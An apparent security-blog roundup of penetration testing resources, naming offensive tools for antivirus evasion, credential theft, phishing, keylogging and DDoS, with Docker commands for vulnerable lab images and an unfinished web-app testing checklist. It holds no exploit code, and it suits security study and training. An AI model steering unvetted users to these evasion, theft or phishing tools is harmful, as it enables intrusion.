Penetration testing and ethical hacking tools are very essential part for every organization to test the vulnerabilities and patch the vulnerable system.

Since the cyber attacks are rapidly increasing, organization need to pay high attention on penetration testing and keep monitoring their network to prevent the attack that may cause a serious damage that leads to hit the company reputation.

In order to manage a security operations, security experts and researchers needs to rely with the security and hacking tools that helps them to minimize the time and effectively monitoring and perform penetration testing on the network to protect the network.

Here we are posting the big list of some of the most important hacking tools that widely used by million of security professionals and thousand of organization around the world.

Penetration Testing & Hacking Tools List

Online Resources – Hacking Tools

Penetration Testing Resources

• Metasploit Unleashed – Free Offensive Security Metasploit course.
• Penetration Testing Execution Standard (PTES) – Documentation designed to provide a common language and scope for performing and reporting the results of a penetration test.
• Open Web Application Security Project (OWASP) – Worldwide not-for-profit charitable organization focused on improving the security of especially Web-based and Application-layer software.
• PENTEST-WIKI – Free online security knowledge library for pentesters and researchers.
• Penetration Testing Framework (PTF) – Outline for performing penetration tests compiled as a general framework usable by vulnerability analysts and penetration testers alike.
• XSS-Payloads – Ultimate resource for all things cross-site including payloads, tools, games and documentation.
• Open Source Security Testing Methodology Manual (OSSTMM) – Framework for providing test cases that result in verified facts on which to base decisions that impact an organization’s security.
• MITRE’s Adversarial Tactics, Techniques & Common Knowledge (ATT&CK) – Curated knowledge base and model for cyber adversary behavior.

Exploit Development

• Shellcode Tutorial – Tutorial on how to write shellcode.
• Shellcode Examples – Shellcodes database.
• Exploit Writing Tutorials – Tutorials on how to develop exploits.

OSINT Resources

• OSINT Framework – Collection of various OSINT Hacking Tools broken out by category.
• Intel Techniques – Collection of OSINT tools. Menu on the left can be used to navigate through the categories.
• NetBootcamp OSINT Tools – Collection of OSINT links and custom Web interfaces to other services such as Facebook Graph Search and various paste sites.
• WiGLE.net – Information about wireless networks world-wide, with user-friendly desktop and web applications.

Social Engineering Resources

• Social Engineering Framework – Information resource for social engineers.

Lock Picking Resources

• Schuyler Towne channel – Lockpicking videos and security talks.
• bosnianbill – More lockpicking videos.
• /r/lockpicking – Resources for learning lockpicking, equipment recommendations.

Operating Systems

• Security related Operating Systems @ Rawsec – Penetration testing tools & Hacking Tools  list Related Complete list of security operating systems.
• Best Linux Penetration Testing Distributions @ CyberPunk – Description of main penetration testing distributions.
• Security @ Distrowatch – Website dedicated to talking about, reviewing, and keeping up to date with open source operating systems.
• cuckoo – Open source automated malware analysis system.
• Computer Aided Investigative Environment (CAINE) – Italian GNU/Linux live distribution created as a digital forensics project.
• Digital Evidence & Forensics Toolkit (DEFT) – Live CD for forensic analysis runnable without tampering or corrupting connected devices where the boot process takes place.
• Tails – Live OS aimed at preserving privacy and anonymity.

Hacking Tools

Penetration Testing Distributions

• Kali – GNU/Linux distribution designed for digital forensics and penetration testing Hacking Tools
• ArchStrike – Arch GNU/Linux repository for security professionals and enthusiasts.
• BlackArch – Arch GNU/Linux-based distribution with best Hacking Tools for penetration testers and security researchers.
• Network Security Toolkit (NST) – Fedora-based bootable live operating system designed to provide easy access to best-of-breed open source network security applications.
• Pentoo – Security-focused live CD based on Gentoo.
• BackBox – Ubuntu-based distribution for penetration tests and security assessments.
• Parrot – Distribution similar to Kali, with multiple architectures with 100 of Hacking Tools.
• Buscador – GNU/Linux virtual machine that is pre-configured for online investigators.
• Fedora Security Lab – Provides a safe test environment to work on security auditing, forensics, system rescue and teaching security testing methodologies.
• The Pentesters Framework – Distro organized around the Penetration Testing Execution Standard (PTES), providing a curated collection of utilities that eliminates often unused toolchains.
• AttifyOS – GNU/Linux distribution focused on tools useful during Internet of Things (IoT) security assessments.

Docker for Penetration Testing

• docker pull kalilinux/kali-linux-docker official Kali Linux
• docker pull owasp/zap2docker-stable – official OWASP ZAP
• docker pull wpscanteam/wpscan – official WPScan
• docker pull citizenstig/dvwa – Damn Vulnerable Web Application (DVWA)
• docker pull wpscanteam/vulnerablewordpress – Vulnerable WordPress Installation
• docker pull hmlio/vaas-cve-2014-6271 – Vulnerability as a service: Shellshock
• docker pull hmlio/vaas-cve-2014-0160 – Vulnerability as a service: Heartbleed
• docker pull opendns/security-ninjas – Security Ninjas
• docker pull diogomonica/docker-bench-security – Docker Bench for Security
• docker pull ismisepaul/securityshepherd – OWASP Security Shepherd
• docker pull danmx/docker-owasp-webgoat – OWASP WebGoat Project docker image
• docker-compose build && docker-compose up – OWASP NodeGoat
• docker pull citizenstig/nowasp – OWASP Mutillidae II Web Pen-Test Practice Application
• docker pull bkimminich/juice-shop – OWASP Juice Shop
• docker pull kalilinux/kali-linux-docker – Kali Linux Docker Image
• docker pull phocean/msf – docker-metasploit

Multi-paradigm Frameworks

• Metasploit – post exploitaion Hacking Tools for offensive security teams to help verify vulnerabilities and manage security assessments.
• Armitage – Java-based GUI front-end for the Metasploit Framework.
• Faraday – Multiuser integrated pentesting environment for red teams performing cooperative penetration tests, security audits, and risk assessments.
• ExploitPack – Graphical tool for automating penetration tests that ships with many pre-packaged exploits.
• Pupy – Cross-platform (Windows, Linux, macOS, Android) remote administration and post-exploitation tool,

Vulnerability Scanners

• Nexpose – Commercial vulnerability and risk management assessment engine that integrates with Metasploit, sold by Rapid7.
• Nessus – Commercial vulnerability management, configuration, and compliance assessment platform, sold by Tenable.
• OpenVAS – Free software implementation of the popular Nessus vulnerability assessment system.
• Vuls – Agentless vulnerability scanner for GNU/Linux and FreeBSD, written in Go.

Static Analyzers

• Brakeman – Static analysis security vulnerability scanner for Ruby on Rails applications.
• cppcheck – Extensible C/C++ static analyzer focused on finding bugs.
• FindBugs – Free software static analyzer to look for bugs in Java code.
• sobelow – Security-focused static analysis for the Phoenix Framework.
• bandit – Security oriented static analyser for python code.

Web Scanners

• Nikto – Noisy but fast black box web server and web application vulnerability scanner.
• Arachni – Scriptable framework for evaluating the security of web applications.
• w3af – Hacking Tools for Web application attack and audit framework.
• Wapiti – Black box web application vulnerability scanner with built-in fuzzer.
• SecApps – In-browser web application security testing suite.
• WebReaver – Commercial, graphical web application vulnerability scanner designed for macOS.
• WPScan – Hacking Tools of Black box WordPress vulnerability scanner.
• cms-explorer – Reveal the specific modules, plugins, components and themes that various websites powered by content management systems are running.
• joomscan – on of the best Hacking Tools for Joomla vulnerability scanner.
• ACSTIS – Automated client-side template injection (sandbox escape/bypass) detection for AngularJS.

Network Tools

• zmap – Open source network scanner that enables researchers to easily perform Internet-wide network studies.
• nmap – Free security scanner for network exploration & security audits.
• pig – one of the Hacking Tools forGNU/Linux packet crafting .
• scanless – Utility for using websites to perform port scans on your behalf so as not to reveal your own IP.
• tcpdump/libpcap – Common packet analyzer that runs under the command line.
• Wireshark – Widely-used graphical, cross-platform network protocol analyzer.
• Network-Tools.com – Website offering an interface to numerous basic network utilities like ping, traceroute, whois, and more.
• netsniff-ng – Swiss army knife for for network sniffing.
• Intercepter-NG – Multifunctional network toolkit.
• SPARTA – Graphical interface offering scriptable, configurable access to existing network infrastructure scanning and enumeration tools.
• dnschef – Highly configurable DNS proxy for pentesters.
• DNSDumpster – one of the Hacking Tools for Online DNS recon and search service.
• CloudFail – Unmask server IP addresses hidden behind Cloudflare by searching old database records and detecting misconfigured DNS.
• dnsenum – Perl script that enumerates DNS information from a domain, attempts zone transfers, performs a brute force dictionary style attack, and then performs reverse look-ups on the results.
• dnsmap – One of the Hacking Tools for Passive DNS network mapper.
• dnsrecon – One of the Hacking Tools for DNS enumeration script.
• dnstracer – Determines where a given DNS server gets its information from, and follows the chain of DNS servers.
• passivedns-client – Library and query tool for querying several passive DNS providers.
• passivedns – Network sniffer that logs all DNS server replies for use in a passive DNS setup.
• Mass Scan – best Hacking Tools for TCP port scanner, spews SYN packets asynchronously, scanning entire Internet in under 5 minutes.
• Zarp – Network attack tool centered around the exploitation of local networks.
• mitmproxy – Interactive TLS-capable intercepting HTTP proxy for penetration testers and software developers.
• Morpheus – Automated ettercap TCP/IP Hacking Tools .
• mallory – HTTP/HTTPS proxy over SSH.
• SSH MITM – Intercept SSH connections with a proxy; all plaintext passwords and sessions are logged to disk.
• Netzob – Reverse engineering, traffic generation and fuzzing of communication protocols.
• DET – Proof of concept to perform data exfiltration using either single or multiple channel(s) at the same time.
• pwnat – Punches holes in firewalls and NATs.
• dsniff – Collection of tools for network auditing and pentesting.
• tgcd – Simple Unix network utility to extend the accessibility of TCP/IP based network services beyond firewalls.
• smbmap – Handy SMB enumeration tool.
• scapy – Python-based interactive packet manipulation program & library.
• Dshell – Network forensic analysis framework.
• Debookee – Simple and powerful network traffic analyzer for macOS.
• Dripcap – Caffeinated packet analyzer.
• Printer Exploitation Toolkit (PRET) – Tool for printer security testing capable of IP and USB connectivity, fuzzing, and exploitation of PostScript, PJL, and PCL printer language features.
• Praeda – Automated multi-function printer data harvester for gathering usable data during security assessments.
• routersploit – Open source exploitation framework similar to Metasploit but dedicated to embedded devices.
• evilgrade – Modular framework to take advantage of poor upgrade implementations by injecting fake updates.
• XRay – Network (sub)domain discovery and reconnaissance automation tool.
• Ettercap – Comprehensive, mature suite for machine-in-the-middle attacks.
• BetterCAP – Modular, portable and easily extensible MITM framework.
• CrackMapExec – A swiss army knife for pentesting networks.
• impacket – A collection of Python classes for working with network protocols.

Wireless Network Hacking Tools

• Aircrack-ng – Set of Penetration testing & Hacking Tools list for auditing wireless networks.
• Kismet – Wireless network detector, sniffer, and IDS.
• Reaver – Brute force attack against WiFi Protected Setup.
• Wifite – Automated wireless attack tool.
• Fluxion – Suite of automated social engineering based WPA attacks.

Transport Layer Security Tools

• SSLyze – Fast and comprehensive TLS/SSL configuration analyzer to help identify security mis-configurations.
• tls_prober – Fingerprint a server’s SSL/TLS implementation.
• testssl.sh – Command line tool which checks a server’s service on any port for the support of TLS/SSL ciphers, protocols as well as some cryptographic flaws.

Web Exploitation

• OWASP Zed Attack Proxy (ZAP) – Feature-rich, scriptable HTTP intercepting proxy and fuzzer for penetration testing web applications.
• Fiddler – Free cross-platform web debugging proxy with user-friendly companion tools.
• Burp Suite – One of the Hacking Tools ntegrated platform for performing security testing of web applications.
• autochrome – Easy to install a test browser with all the appropriate setting needed for web application testing with native Burp support, from NCCGroup.
• Browser Exploitation Framework (BeEF) – Command and control server for delivering exploits to commandeered Web browsers.
• Offensive Web Testing Framework (OWTF) – Python-based framework for pentesting Web applications based on the OWASP Testing Guide.
• WordPress Exploit Framework – Ruby framework for developing and using modules which aid in the penetration testing of WordPress powered websites and systems.
• WPSploit – Exploit WordPress-powered websites with Metasploit.
• SQLmap – Automatic SQL injection and database takeover tool.
• tplmap – Automatic server-side template injection and Web server takeover Hacking Tools .
• weevely3 – Weaponized web shell.
• Wappalyzer – Wappalyzer uncovers the technologies used on websites.
• WhatWeb – Website fingerprinter.
• BlindElephant – Web application fingerprinter.
• wafw00f – Identifies and fingerprints Web Application Firewall (WAF) products.
• fimap – Find, prepare, audit, exploit and even Google automatically for LFI/RFI bugs.
• Kadabra – Automatic LFI exploiter and scanner.
• Kadimus – LFI scan and exploit tool.
• liffy – LFI exploitation tool.
• Commix – Automated all-in-one operating system command injection and exploitation tool.
• DVCS Ripper – Rip web accessible (distributed) version control systems: SVN/GIT/HG/BZR.
• GitTools – One of the Hacking Tools that Automatically find and download Web-accessible .git repositories.
• sslstrip –
  One of the Hacking Tools Demonstration of the HTTPS stripping attacks.
• sslstrip2 – SSLStrip version to defeat HSTS.
• NoSQLmap – Automatic NoSQL injection and database takeover tool.
• VHostScan – A virtual host scanner that performs reverse lookups, can be used with pivot tools, detect catch-all scenarios, aliases and dynamic default pages.
• FuzzDB – Dictionary of attack patterns and primitives for black-box application fault injection and resource discovery.
• EyeWitness – Tool to take screenshots of websites, provide some server header info, and identify default credentials if possible.
• webscreenshot – A simple script to take screenshots of list of websites.

Hex Editors

• HexEdit.js – Browser-based hex editing.
• Hexinator – World’s finest (proprietary, commercial) Hex Editor.
• Frhed – Binary file editor for Windows.
• 0xED – Native macOS hex editor that supports plug-ins to display custom data types.

File Format Analysis Tools

• Kaitai Struct – File formats and network protocols dissection language and web IDE, generating parsers in C++, C#, Java, JavaScript, Perl, PHP, Python, Ruby.
• Veles – Binary data visualization and analysis tool.
• Hachoir – Python library to view and edit a binary stream as tree of fields and tools for metadata extraction.

Defense Evasion Tools

• Veil – Generate metasploit payloads that bypass common anti-virus solutions.
• shellsploit – Generates custom shellcode, backdoors, injectors, optionally obfuscates every byte via encoders.
• Hyperion – Runtime encryptor for 32-bit portable executables (“PE .exes”).
• AntiVirus Evasion Tool (AVET) – Post-process exploits containing executable files targeted for Windows machines to avoid being recognized by antivirus software.
• peCloak.py – Automates the process of hiding a malicious Windows executable from antivirus (AV) detection.
• peCloakCapstone – Multi-platform fork of the peCloak.py automated malware antivirus evasion tool.
• UniByAv – Simple obfuscator that takes raw shellcode and generates Anti-Virus friendly executables by using a brute-forcable, 32-bit XOR key.

Hash Cracking Hacking Tools

• John the Ripper – One of the best Hacking Tools for Fast password cracker.
• Hashcat – Another One of the Hacking Tools The more fast hash cracker.
• CeWL – Generates custom wordlists by spidering a target’s website and collecting unique words.
• JWT Cracker – Simple HS256 JWT token brute force cracker.
• Rar Crack – RAR bruteforce cracker.
• BruteForce Wallet – Find the password of an encrypted wallet file (i.e. wallet.dat).

Windows Utilities

• Sysinternals Suite – The Sysinternals Troubleshooting Utilities.
• Windows Credentials Editor – Inspect logon sessions and add, change, list, and delete associated credentials, including Kerberos tickets.
• mimikatz – Credentials extraction tool for Windows operating system.
• PowerSploit – PowerShell Post-Exploitation Framework.
• Windows Exploit Suggester – Detects potential missing patches on the target.
• Responder – LLMNR, NBT-NS and MDNS poisoner.
• Bloodhound – Graphical Active Directory trust relationship explorer.
• Empire – Pure PowerShell post-exploitation agent.
• Fibratus – Tool for exploration and tracing of the Windows kernel.
• wePWNise – Generates architecture independent VBA code to be used in Office documents or templates and automates bypassing application control and exploit mitigation software.
• redsnarf – Post-exploitation tool for retrieving password hashes and credentials from Windows workstations, servers, and domain controllers.
• Magic Unicorn – Shellcode generator for numerous attack vectors, including Microsoft Office macros, PowerShell, HTML applications (HTA), or certutil (using fake certificates).
• DeathStar – Python script that uses Empire’s RESTful API to automate gaining Domain Admin rights in Active Directory environments.

GNU/Linux Utilities

• Linux Exploit Suggester – Heuristic reporting on potentially viable exploits for a given GNU/Linux system.

macOS Utilities

• Bella – Pure Python post-exploitation data mining and remote administration tool for macOS.

DDoS Tools

• LOIC – Open source network stress tool for Windows.
• JS LOIC – JavaScript in-browser version of LOIC.
• SlowLoris – DoS tool that uses low bandwidth on the attacking side.
• HOIC – Updated version of Low Orbit Ion Cannon, has ‘boosters’ to get around common counter measures.
• T50 – Faster network stress tool.
• UFONet – Abuses OSI layer 7 HTTP to create/manage ‘zombies’ and to conduct different attacks using; GET/POST, multithreading, proxies, origin spoofing methods, cache evasion techniques, etc.

Social Engineering Tools

• Social Engineer Toolkit (SET) – Open source pentesting framework designed for social engineering featuring a number of custom attack vectors to make believable attacks quickly.
• King Phisher – One of the Hacking Tools for Phishing campaign toolkit used for creating and managing multiple simultaneous phishing attacks with custom email and server content.
• Evilginx – MITM attack framework used for phishing credentials and session cookies from any Web service.
• wifiphisher – Automated phishing attacks against WiFi networks.
• Catphish – Tool for phishing and corporate espionage written in Ruby.
• Beelogger – Tool for generating keylooger.

OSINT Tools

• Maltego – One of the Hacking Tools and Proprietary software for open source intelligence and forensics, from Paterva.
• theHarvester – E-mail, subdomain and people names harvester.
• creepy – Geolocation OSINT tool.
• metagoofil – Metadata harvester.
• Google Hacking Database – Database of Google dorks; can be used for recon.
• Google-dorks – Common Google dorks and others you probably don’t know.
• GooDork – Command line Google dorking tool.
• dork-cli – Command line Google dork tool.
• Censys – Collects data on hosts and websites through daily ZMap and ZGrab scans.
• Shodan – World’s first search engine for Internet-connected devices.
• recon-ng – One of the Hacking Tools Full-featured Web Reconnaissance framework written in Python.
• github-dorks – CLI tool to scan Github repos/organizations for potential sensitive information leak.
• vcsmap – Plugin-based tool to scan public version control systems for sensitive information.
• Spiderfoot – Multi-source OSINT automation tool with a Web UI and report visualizations
• BinGoo – GNU/Linux bash based Bing and Google Dorking Tool.
• fast-recon – Perform Google dorks against a domain.
• snitch – Information gathering via dorks.
• Sn1per – ons of the Hacking Tools for Automated Pentest Recon Scanner.
• Threat Crowd – Search engine for threats.
• Virus Total – VirusTotal is a free service that analyzes suspicious files and URLs and facilitates the quick detection of viruses, worms, trojans, and all kinds of malware.
• DataSploit – OSINT visualizer utilizing Shodan, Censys, Clearbit, EmailHunter, FullContact, and Zoomeye behind the scenes.
• AQUATONE – Subdomain discovery tool utilizing various open sources producing a report that can be used as input to other tools.
• Intrigue – Automated OSINT & Attack Surface discovery framework with powerful API, UI and CLI.
• ZoomEye – Search engine for cyberspace that lets the user find specific network components.

Anonymity Tools

• Tor – Free software and onion routed overlay network that helps you defend against traffic analysis.
• OnionScan – One of the Hacking Tools for investigating the Dark Web by finding operational security issues introduced by Tor hidden service operators.
• I2P – The Invisible Internet Project.
• Nipe – Script to redirect all traffic from the machine to the Tor network.
• What Every Browser Knows About You – Comprehensive detection page to test your own Web browser’s configuration for privacy and identity leaks.

Reverse Engineering Tools

• Interactive Disassembler (IDA Pro) – Proprietary multi-processor disassembler and debugger for Windows, GNU/Linux, or macOS; also has a free version, IDA Free.
• WDK/WinDbg – Windows Driver Kit and WinDbg.
• OllyDbg – x86 debugger for Windows binaries that emphasizes binary code analysis.
• Radare2 – Open source, crossplatform reverse engineering framework.
• x64dbg – Open source x64/x32 debugger for windows.
• Immunity Debugger – Powerful way to write exploits and analyze malware.
• Evan’s Debugger – OllyDbg-like debugger for GNU/Linux.
• Medusa – Open source, cross-platform interactive disassembler.
• plasma – Interactive disassembler for x86/ARM/MIPS. Generates indented pseudo-code with colored syntax code.
• peda – Python Exploit Development Assistance for GDB.
• dnSpy – one of the Hacking Tools to reverse engineer .NET assemblies.
• binwalk – Fast, easy to use tool for analyzing, reverse engineering, and extracting firmware images.
• PyREBox – Python scriptable Reverse Engineering sandbox by Cisco-Talos.
• Voltron – Extensible debugger UI toolkit written in Python.
• Capstone – Lightweight multi-platform, multi-architecture disassembly framework.
• rVMI – Debugger on steroids; inspect userspace processes, kernel drivers, and preboot environments in a single tool.
• Frida – Dynamic instrumentation toolkit for developers, reverse-engineers, and security researchers.

Physical Access Tools

• LAN Turtle – Covert “USB Ethernet Adapter” that provides remote access, network intelligence gathering, and MITM capabilities when installed in a local network.
• USB Rubber Ducky – Customizable keystroke injection attack platform masquerading as a USB thumbdrive.
• Poisontap – Siphons cookies, exposes internal (LAN-side) router and installs web backdoor on locked computers.
• WiFi Pineapple – Wireless auditing and penetration testing platform.
• Proxmark3 – RFID/NFC cloning, replay, and spoofing toolkit often used for analyzing and attacking proximity cards/readers, wireless keys/keyfobs, and more.

Side-channel Tools

• ChipWhisperer – Complete open-source toolchain for side-channel power analysis and glitching attacks.

CTF Tools

• ctf-tools – Collection of setup scripts to install various security research tools easily and quickly deployable to new machines.
• Pwntools – Rapid exploit development framework built for use in CTFs.
• RsaCtfTool – Decrypt data enciphered using weak RSA keys, and recover private keys from public keys using a variety of automated attacks.

Penetration Testing Report Templates

• Public Pentesting Reports – Curated list of public penetration test reports released by several consulting firms and academic security groups.
• Pentesting Report Template – testandverification.com template.
• Pentesting Report Template – hitachi-systems-security.com template.
• Pentesting Report Template – lucideus.com template.
• Pentesting Report Template – crest-approved.org templage.
• Pentesting Report Template – pcisecuritystandards.org template.

Books

Penetration Testing Books

• The Art of Exploitation by Jon Erickson, 2008
• Metasploit: The Penetration Tester’s Guide by David Kennedy et al., 2011
• Penetration Testing: A Hands-On Introduction to Hacking by Georgia Weidman, 2014
• Rtfm: Red Team Field Manual by Ben Clark, 2014
• The Hacker Playbook by Peter Kim, 2014
• The Basics of Hacking and Penetration Testing by Patrick Engebretson, 2013
• Professional Penetration Testing by Thomas Wilhelm, 2013
• Advanced Penetration Testing for Highly-Secured Environments by Lee Allen, 2012
• Violent Python by TJ O’Connor, 2012
• Fuzzing: Brute Force Vulnerability Discovery by Michael Sutton et al., 2007
• Black Hat Python: Python Programming for Hackers and Pentesters by Justin Seitz, 2014
• Penetration Testing: Procedures & Methodologies by EC-Council, 2010
• Unauthorised Access: Physical Penetration Testing For IT Security Teams by Wil Allsopp, 2010
• Advanced Persistent Threat Hacking: The Art and Science of Hacking Any Organization by Tyler Wrightson, 2014
• Bug Hunter’s Diary by Tobias Klein, 2011
• Advanced Penetration Testing by Wil Allsopp, 2017

Hackers Handbook Series

• The Database Hacker’s Handbook, David Litchfield et al., 2005
• The Shellcoders Handbook by Chris Anley et al., 2007
• The Mac Hacker’s Handbook by Charlie Miller & Dino Dai Zovi, 2009
• The Web Application Hackers Handbook by D. Stuttard, M. Pinto, 2011
• iOS Hackers Handbook by Charlie Miller et al., 2012
• Android Hackers Handbook by Joshua J. Drake et al., 2014
• The Browser Hackers Handbook by Wade Alcorn et al., 2014
• The Mobile Application Hackers Handbook by Dominic Chell et al., 2015
• Car Hacker’s Handbook by Craig Smith, 2016

Defensive Development

• Holistic Info-Sec for Web Developers (Fascicle 0)
• Holistic Info-Sec for Web Developers (Fascicle 1)

Network Analysis Books

• Nmap Network Scanning by Gordon Fyodor Lyon, 2009
• Practical Packet Analysis by Chris Sanders, 2011
• Wireshark Network Analysis by by Laura Chappell & Gerald Combs, 2012
• Network Forensics: Tracking Hackers through Cyberspace by Sherri Davidoff & Jonathan Ham, 2012

Reverse Engineering Books

• Reverse Engineering for Beginners by Dennis Yurichev
• Hacking the Xbox by Andrew Huang, 2003
• The IDA Pro Book by Chris Eagle, 2011
• Practical Reverse Engineering by Bruce Dang et al., 2014
• Gray Hat Hacking The Ethical Hacker’s Handbook by Daniel Regalado et al., 2015

Malware Analysis Books

• Practical Malware Analysis by Michael Sikorski & Andrew Honig, 2012
• The Art of Memory Forensics by Michael Hale Ligh et al., 2014
• Malware Analyst’s Cookbook and DVD by Michael Hale Ligh et al., 2010

Windows Books

• Windows Internals by Mark Russinovich et al., 2012
• Troubleshooting with the Windows Sysinternals Tools by Mark Russinovich & Aaron Margosis, 2016

Social Engineering Books

• The Art of Deception by Kevin D. Mitnick & William L. Simon, 2002
• The Art of Intrusion by Kevin D. Mitnick & William L. Simon, 2005
• Ghost in the Wires by Kevin D. Mitnick & William L. Simon, 2011
• No Tech Hacking by Johnny Long & Jack Wiles, 2008
• Social Engineering: The Art of Human Hacking by Christopher Hadnagy, 2010
• Unmasking the Social Engineer: The Human Element of Security by Christopher Hadnagy, 2014
• Social Engineering in IT Security: Tools, Tactics, and Techniques by Sharon Conheady, 2014

Lock Picking Books

• Practical Lock Picking by Deviant Ollam, 2012
• Keys to the Kingdom by Deviant Ollam, 2012
• Lock Picking: Detail Overkill by Solomon
• Eddie the Wire books

Defcon Suggested Reading – Hacking Tools

• Defcon Suggested Reading

Vulnerability Databases – Hacking Tools

• Common Vulnerabilities and Exposures (CVE) – Dictionary of common names (i.e., CVE Identifiers) for publicly known security vulnerabilities.
• National Vulnerability Database (NVD) – United States government’s National Vulnerability Database provides additional meta-data (CPE, CVSS scoring) of the standard CVE List along with a fine-grained search engine.
• US-CERT Vulnerability Notes Database – Summaries, technical details, remediation information, and lists of vendors affected by software vulnerabilities, aggregated by the United States Computer Emergency Response Team (US-CERT).
• Full-Disclosure – Public, vendor-neutral forum for detailed discussion of vulnerabilities, often publishes details before many other sources.
• Bugtraq (BID) – Software security bug identification database compiled from submissions to the SecurityFocus mailing Penetration testing tools list and other sources, operated by Symantec, Inc.
• Exploit-DB – Non-profit project hosting exploits for software vulnerabilities, provided as a public service by Offensive Security.
• Microsoft Security Bulletins – Announcements of security issues discovered in Microsoft software, published by the Microsoft Security Response Center (MSRC).
• Microsoft Security Advisories – Archive of security advisories impacting Microsoft software.
• Mozilla Foundation Security Advisories – Archive of security advisories impacting Mozilla software, including the Firefox Web Browser.
• Packet Storm – Compendium of exploits, advisories, tools, and other security-related resources aggregated from across the industry.
• CXSecurity – Archive of published CVE and Bugtraq software vulnerabilities cross-referenced with a Google dork database for discovering the listed vulnerability.
• SecuriTeam – Independent source of software vulnerability information.
• Vulnerability Lab – Open forum for security advisories organized by category of exploit target.
• Zero Day Initiative – Bug bounty program with the publicly accessible archive of published security advisories, operated by TippingPoint.
• Vulners – Security database of software vulnerabilities.
• Inj3ct0r (Onion service) – Exploit marketplace and vulnerability information aggregator.
• Open Source Vulnerability Database (OSVDB) – Historical archive of security vulnerabilities in computerized equipment, no longer adding to its vulnerability database as of April, 2016.Hacking Tools
• HPI-VDB – Aggregator of cross-referenced software vulnerabilities offering free-of-charge API access, provided by the Hasso-Plattner Institute, Potsdam.Hacking Tools

Security Courses – Hacking Tools – Hacking Tools

• Offensive Security Training – Training from BackTrack/Kali developers.
• SANS Security Training – Computer Security Training & Certification.
• Open Security Training – Training material for computer security classes.
• CTF Field Guide – Everything you need to win your next CTF competition.
• ARIZONA CYBER WARFARE RANGE – 24×7 live fire exercises for beginners through real world operations; capability for upward progression into the real world of cyber warfare.
• Cybrary – Free courses in ethical hacking and advanced penetration testing. Advanced penetration testing courses are based on the book ‘Penetration Testing for Highly-Secured Environments’.
• Computer Security Student – Many free tutorials, great for beginners, $10/mo membership unlocks all content.
• European Union Agency for Network and Information Security – ENISA Cyber Security Training material.

Information Security Conferences – Hacking Tools

• DEF CON – Annual hacker convention in Las Vegas.
• Black Hat – Annual security conference in Las Vegas.
• BSides – Framework for organising and holding security conferences.
• CCC – Annual meeting of the international hacker scene in Germany.
• DerbyCon – Annual hacker conference based in Louisville.
• PhreakNIC – Technology conference held annually in middle Tennessee.
• ShmooCon – Annual US East coast hacker convention.
• CarolinaCon – Infosec conference, held annually in North Carolina.
• CHCon – Christchurch Hacker Con, Only South Island of New Zealand hacker con.
• SummerCon – One of the oldest hacker conventions, held during Summer.
• Hack.lu – Annual conference held in Luxembourg.
• Hackfest – Largest hacking conference in Canada.
• HITB – Deep-knowledge security conference held in Malaysia and The Netherlands.
• Troopers – Annual international IT Security event with workshops held in Heidelberg, Germany.
• Hack3rCon – Annual US hacker conference.
• ThotCon – Annual US hacker conference held in Chicago.
• LayerOne – Annual US security conference held every spring in Los Angeles.
• DeepSec – Security Conference in Vienna, Austria.
• SkyDogCon – Technology conference in Nashville.
• SECUINSIDE – Security Conference in Seoul.
• DefCamp – Largest Security Conference in Eastern Europe, held annually in Bucharest, Romania.
• AppSecUSA – Annual conference organized by OWASP.
• BruCON – Annual security conference in Belgium.
• Infosecurity Europe – Europe’s number one information security event, held in London, UK.
• Nullcon – Annual conference in Delhi and Goa, India.
• RSA Conference USA – Annual security conference in San Francisco, California, USA.
• Swiss Cyber Storm – Annual security conference in Lucerne, Switzerland.
• Virus Bulletin Conference – Annual conference going to be held in Denver, USA for 2016.
• Ekoparty – Largest Security Conference in Latin America, held annually in Buenos Aires, Argentina.
• 44Con – Annual Security Conference held in London.
• BalCCon – Balkan Computer Congress, annually held in Novi Sad, Serbia.
• FSec – FSec – Croatian Information Security Gathering in Varaždin, Croatia.

Information Security Magazines – Hacking Tools

• 2600: The Hacker Quarterly – American publication about technology and computer “underground.”
• Phrack Magazine – By far the longest running hacker zine.

Awesome Lists – Hacking Tools –

• Kali Linux Tools – List of Hacking tools present in Kali Linux.
• SecTools – Top 125 Network Security Hacking Tools.
• Pentest Cheat Sheets – Awesome Pentest Cheat Sheets.
• C/C++ Programming – One of the main language for open source security tools.
• .NET Programming – Software framework for Microsoft Windows platform development.
• Shell Scripting – Command line frameworks, toolkits, guides and gizmos.
• Ruby Programming by @dreikanter – The de-facto language for writing exploits.
• Ruby Programming by @markets – The de-facto language for writing exploits.
• Ruby Programming by @Sdogruyol – The de-facto language for writing exploits.
• JavaScript Programming – In-browser development and scripting.
• Node.js Programming by @sindresorhus – Curated list of delightful Node.js packages and resources.
• Python tools for penetration testers – Lots of pentesting tools are written in Python.
• Python Programming by @svaksha – General Python programming.
• Python Programming by @vinta – General Python programming.
• Android Security – Collection of Android security-related resources.
• Awesome Awesomness – The List of the Lists.
• AppSec – Resources for learning about application security.
• CTFs – Capture The Flag frameworks, libraries, etc.
• InfoSec § Hacking challenges – Comprehensive directory of CTFs, wargames, hacking challenge websites,Penetration testing tools list practice lab exercises, and more.
• Hacking – Tutorials, tools, and resources.
• Honeypots – Honeypots, tools, components, and more.
• Infosec – Information security resources for pentesting, forensics, and more.
• Forensics – Free (mostly open source) forensic analysis tools and resources.
• Malware Analysis – Tools and resources for analysts.
• PCAP Tools – Tools for processing network traffic.
• Security – Software, libraries, documents, and other resources.
• Awesome Lockpicking – Awesome guides, tools, and other resources about the security and compromise of locks, safes, and keys.
• SecLists – Collection of multiple types of lists used during security assessments.
• Security Talks – Curated list of security conferences.
• OSINT – Awesome OSINT list containing great resources.
• YARA – YARA rules, tools, and people.

The post A Complete Penetration Testing & Hacking Tools List for Hackers & Security Professionals appeared first on Tech Chronicles.

Repeatable Testing and Conduct a serious method One of the Best Method conduct Web Application Penetration Testing for all kind of web application vulnerabilities.

Web Application Penetration Testing Checklist

Information Gathering

1. Retrieve and Analyze the robot.txt files by using a tool called GNU Wget.

2. Examine the version of the software. database Details, the error technical component, bugs by the error codes by requesting invalid pages.

3. Implement techniques such as DNS inverse queries, DNS zone Transfers, web-based DNS Searches.

4. Perform Directory style Searching and vulnerability scanning, Probe for URLs, using tools such as NMAP and Nessus.

5. Identify the Entry point of the application using Burp Proxy, OWSAP ZAP, TemperIE, WebscarabTemper Data.

6. By using traditional Fingerprint Tool such as Nmap, Amap, perform TCP/ICMP and service Fingerprinting.

7. By Requesting Common File Extension such as.ASP,EXE, .HTML, .PHP ,Test for recognized file types/Extensions/Directories.

8. Examine the Sources code From the Accessing Pages of the Application front end.

Authentication Testing

